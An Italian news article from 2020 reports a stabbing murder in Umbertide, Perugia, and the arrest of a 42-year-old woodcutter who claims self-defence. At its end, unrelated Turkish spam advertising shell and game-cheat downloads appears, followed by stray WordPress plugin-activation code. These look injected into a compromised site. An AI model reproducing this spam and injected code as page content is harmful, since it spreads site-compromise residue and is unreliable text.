Omicidio nella notte, arrestato boscaiolo marocchino di 42 anni. Dopo le coltellate le botte con il matterello. La vittima è un 35enne



Alessandro Antonini

18 ottobre 2020

Omicidio nella notte. E’ un boscaiolo incensurato di 42 anni, marocchino, l’uomo fermato per la morte di un connazionale a Umbertide, in provincia di Perugia. Ha ammesso di aver colpito la vittima, 35 anni, con un coltello da cucina al petto e alla schiena, ma ha spiegato agli inquirenti che lo ha fatto per legittima difesa. L’altro infatti lo avrebbe aggredito con un portaombrelli, al culmine di una lite nata per gelosia, dopo una serata passata a bere, nella stessa casa di via Roma 48. Il 42enne è indagato per omicidio volontario aggravato dai futili motivi e dalla crudeltà. Dopo le coltellate, l’aggressore ha infierito con un matterello lungo un metro. La colluttazione si è sviluppata sia dentro che fuori l’appartamento. Tracce di sangue sono state repertate in un raggio di venti metri dall’immobile.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );